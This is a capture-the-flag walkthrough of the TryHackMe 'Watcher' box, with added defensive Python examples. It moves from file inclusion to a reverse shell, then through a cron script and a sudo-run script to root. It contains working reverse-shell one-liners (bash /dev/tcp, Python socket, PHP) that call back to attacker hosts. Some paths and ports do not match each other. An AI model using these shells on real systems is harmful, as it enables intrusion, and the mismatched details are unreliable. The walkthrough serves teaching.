thm-watcher-public

Enumeration


Starting off with an nmap scan, I find that FTP, SSH and HTTP are open

root@kali:~/tryhackme/watcher# nmap -sC -sV 10.10.180.180
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-17 20:44 EST
Nmap scan report for 10.10.180.180
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Running gobuster to help find directories, I find post.php and robots.txt

root@kali:~/tryhackme/watcher# gobuster dir -u 10.10.180.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.180.180
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2021/02/17 20:45:30 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/post.php (Status: 200)
/css (Status: 301)
/robots.txt (Status: 200)

Flag 1


Going to robots.txt, I find two Allow entries

[screenshot: robots]

Navigating to 10.10.180.180/flag.txt, I obtain the first flag

[screenshot: flag1]

Flag 2


Trying to access the /secret_file_do_not_read.txt file, I receive a 403 error

[screenshot: 403]

Going back to my gobuster results, I found /post.php. Navigating there, the page loads but I do not receive anything.

[screenshot: 200]

I could try fuzzing, but first I went back to the home page and looked at the source code. Here, I find that post.php takes a parameter named post

[screenshot: source]

Testing this, I find it is vulnerable to local file inclusion by changing the URL to post.php?post=../../../../../../etc/passwd

[screenshot: passwd]

I want to read /secret_file_do_not_read.txt, which I did not have permission to access earlier. Reading it through the LFI vulnerability works, and I find FTP credentials

[screenshot: ftpcreds]

Using these credentials, I can log in to FTP and download the flag_2.txt file

root@kali:~/tryhackme/watcher# ftp 10.10.180.180

Connected to 10.10.180.180.
220 (vsFTPd 3.0.3)
Name (10.10.180.180:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

ftp> get flag_2.txt 

local: flag_2.txt remote: flag_2.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag_2.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (15.2022 kB/s)

I can now read the second flag

[screenshot: flag2]

Flag 3


Looking at the FTP server, I am allowed to upload items in the /files folder

ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 .
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 ..
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

I can upload files via FTP and then include them through the LFI vulnerability. I also know the files directory is located at /home/ftpuser/ftp/files thanks to the note that gave me the FTP credentials. This will allow me to get a reverse shell. To start, I download a PHP reverse shell and edit the IP address. Then I upload it to the FTP files directory

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5491 bytes sent in 0.00 secs (137.8059 MB/s)

Now that I have uploaded the file, I start a netcat listener. Then, using the LFI vulnerability, I request the PHP file so that it executes

curl http://10.10.180.180/post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php

Looking at my netcat listener, I see I receive a connect back.

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 56586
Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:13:50 up  3:00,  2 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
will     pts/6    10.2.8.75        00:50   33:34   0.31s  0.31s -bash
root     pts/7    10.2.8.75        01:41   32:37   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
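As an added example (written in Python for illustration, not the box's PHP and not code from this write-up), here is how a parameter like post.php's post can be resolved so that neither the ../ traversal above nor an FTP-uploaded file is ever included; POSTS_DIR and the .html extension are assumptions.

```python
"""Safe resolution of a `post` parameter like the one post.php takes.

Added example, not code from the write-up or the box: post.php includes
whatever path `post` names, so `../../etc/passwd` and an FTP-uploaded
.php file both get pulled in.  This resolver only returns paths that end
up inside one fixed directory and carry the expected extension.
"""
import os

POSTS_DIR = "/var/www/html/posts"   # assumed location of legitimate posts


def resolve_post(param: str, base_dir: str = POSTS_DIR):
    """Return the absolute file to serve, or None if the request is unsafe."""
    if not param or "\x00" in param or os.path.isabs(param):
        return None                          # empty, NUL-truncated, or absolute
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, param))
    # realpath collapses every ../ so a traversal lands outside base;
    # commonpath (not startswith) also rejects a sibling like /posts-old
    if os.path.commonpath([base, target]) != base:
        return None
    if not target.endswith(".html"):
        return None                          # never include arbitrary files
    return target
```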

I then use python3 to spawn a PTY and upgrade the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@watcher:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# fg

www-data@watcher:/$ 

I can now read the 3rd flag under /var/www/html/more_secrets_a9f10a

[screenshot: flag3]

Flag 4


As www-data, I see I am allowed to run any command as the toby user

www-data@watcher:/$ sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL

I can switch to the toby user without a password by running bash through sudo

www-data@watcher:/$ sudo -u toby /bin/bash
toby@watcher:/$ 

As toby, I can now read flag 4

[screenshot: flag4]

Flag 5


Under toby’s home directory, I find a note stating cron jobs are running, likely under the jobs directory

toby@watcher:~$ ls
flag_4.txt  jobs  note.txt

toby@watcher:~$ cat note.txt  
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

This exploit is easy to find, but you could also use pspy to monitor processes and spot running cron jobs. Upload the pspy64 binary, then execute it

toby@watcher:~$ wget 10.2.8.75/pspy64
--2021-02-18 02:25:49--  http://10.2.8.75/pspy64
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M   463KB/s    in 7.6s    

2021-02-18 02:25:57 (395 KB/s) - 'pspy64' saved [3078592/3078592]

toby@watcher:~$ chmod +x pspy64 
toby@watcher:~$ ./pspy64

Looking at the results, I see that cow.sh under /home/toby/jobs is a cron job run every minute

2021/02/18 02:27:01 CMD: UID=1002 PID=1832   | 
2021/02/18 02:27:01 CMD: UID=1002 PID=1831   | /bin/bash /home/toby/jobs/cow.sh 
2021/02/18 02:27:01 CMD: UID=1002 PID=1830   | /bin/sh -c /home/toby/jobs/cow.sh 

Looking at this file, I see my current user can edit it

toby@watcher:~/jobs$ ls -la cow.sh 
-rwxr-xr-x 1 toby toby 46 Dec  3 03:31 cow.sh

I put a bash reverse shell at the bottom of the script to call back to my local machine

toby@watcher:~/jobs$ echo "bash -i >& /dev/tcp/10.2.8.75/8080 0>&1" >> cow.sh

After that, I set up my netcat listener and wait for less than a minute. I receive a connect back as the mat user

root@kali:~/tryhackme/watcher# nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 40798
bash: cannot set terminal process group (1887): Inappropriate ioctl for device
bash: no job control in this shell
mat@watcher:~$ 

I can now read the 5th flag

[screenshot: flag5]

Flag 6


There is a note left on mat’s desktop from the will user. This note says I can run a Python script as him using sudo

mat@watcher:~$ cat note.txt 
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will

Running sudo -l, I confirm this is true

mat@watcher:~$ sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *

Reading the script we can run as will, I see it imports os, sys and cmd

mat@watcher:~/scripts$ cat will_script.py 
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)

Looking at the file permissions, I see my current user owns cmd.py. This means I can insert commands into cmd.py, and they will execute when I run will_script.py through sudo

mat@watcher:~/scripts$ ls -la
total 16
drwxrwxr-x 2 will will 4096 Dec  3 03:31 .
drwxr-xr-x 6 mat  mat  4096 Dec  3 03:31 ..
-rw-r--r-- 1 mat  mat   133 Dec  3 03:31 cmd.py
-rw-r--r-- 1 will will  208 Dec  3 01:58 will_script.py
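The cron job above (cow.sh, owned by toby but run by mat) and this sudo script (cmd.py, owned by mat but imported by a script sudo runs as will) share one flaw: a lower-privileged user can write a file that a higher-privileged job trusts. The following added example (not from the write-up) parses ls -la lines like the ones shown and flags such files; the user each file is assumed to run as is taken from the walkthrough.

```python
"""Audit files that a privileged job runs or imports.

Added example, not from the write-up.  It parses `ls -la` lines like the
ones above and flags files whose writers are not limited to root and the
user the job runs as, which is the flaw behind both cow.sh and cmd.py.
"""
from __future__ import annotations
import re
from collections import namedtuple

# Constructed from the listings in the write-up; the second element is the
# user the file is executed or imported as (an assumption of this example).
LISTING = [
    ("-rwxr-xr-x 1 toby toby   46 Dec  3 03:31 cow.sh",         "mat"),
    ("-rw-r--r-- 1 mat  mat   133 Dec  3 03:31 cmd.py",         "will"),
    ("-rw-r--r-- 1 will will  208 Dec  3 01:58 will_script.py", "will"),
]

# mode, link count, owner, group, size, month, day, time-or-year, name
LS_RE = re.compile(r"^([-dl][rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+"
                   r"\s+\S+\s+\d+\s+\S+\s+(.+)$")

Entry = namedtuple("Entry", "mode owner group name")


def parse_ls_line(line: str) -> Entry:
    m = LS_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an ls -l line: {line!r}")
    return Entry(*m.groups())


def audit(entry: Entry, run_as: str, run_as_groups: tuple = ()) -> list[str]:
    """Reasons a job running as `run_as` must not trust `entry`.  A group
    named after the job's user is treated as its primary group (heuristic)."""
    problems = []
    if entry.owner not in ("root", run_as):
        problems.append(f"owned by {entry.owner}, who can rewrite it")
    if entry.mode[5] == "w" and entry.group not in ("root", run_as, *run_as_groups):
        problems.append(f"writable by group {entry.group}")
    if entry.mode[8] == "w":
        problems.append("world-writable")
    return problems


def audit_listing(listing=LISTING) -> dict:
    return {parse_ls_line(l).name: audit(parse_ls_line(l), u) for l, u in listing}


if __name__ == "__main__":
    for name, problems in audit_listing().items():
        print(f"{name}: {'; '.join(problems) or 'OK'}")
```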

I grab a Python reverse shell and insert it into cmd.py

mat@watcher:~/scripts$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.2.255',9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Running will_script.py as will with the following command gets us a shell.

mat@watcher:~/scripts$ sudo -u will python3 /home/mat/scripts/will_script.py cmd.py

Looking at my netcat listener, I received a connect back as will

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 38226
$ whoami
will

I use python3 to spawn a PTY and upgrade the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
will@watcher:~/scripts$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# nc -lvnp 1234

will@watcher:~/scripts$ 

Now, I can read the 6th flag

[screenshot: flag6]

Flag 7


Looking into the will user, I find he is part of the adm group

will@watcher:/home/will$ id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)

Since this is an unusual group, I want to find whether any files belong to it. Here, I find a file named key.b64

will@watcher:/home/will$ find / -group adm   
/opt/backups
/opt/backups/key.b64

Reading the file shows a large base64 value

will@watcher:/home/will$ cat /opt/backups/key.b64

Decoding this base64 value shows an id_rsa.

will@watcher:/home/will$ cat /opt/backups/key.b64 | base64 -d
-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----

I copy this id_rsa to my local machine and change the file permissions so it is usable

root@kali:~/tryhackme/watcher# chmod 600 id_rsa

Testing this id_rsa against the root account, I find it is valid and allows me to log in

root@kali:~/tryhackme/watcher# ssh -i id_rsa root@10.10.180.180
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 18 02:48:28 UTC 2021

  System load:  0.0                Processes:             122
  Usage of /:   22.3% of 18.57GB   Users logged in:       0
  Memory usage: 38%                IP address for eth0:   10.10.180.180
  Swap usage:   0%                 IP address for lxdbr0: 10.14.179.1


33 packages can be updated.
0 updates are security updates.


Last login: Thu Dec  3 03:25:38 2020
root@watcher:~# 

As root, I can now read the final flag
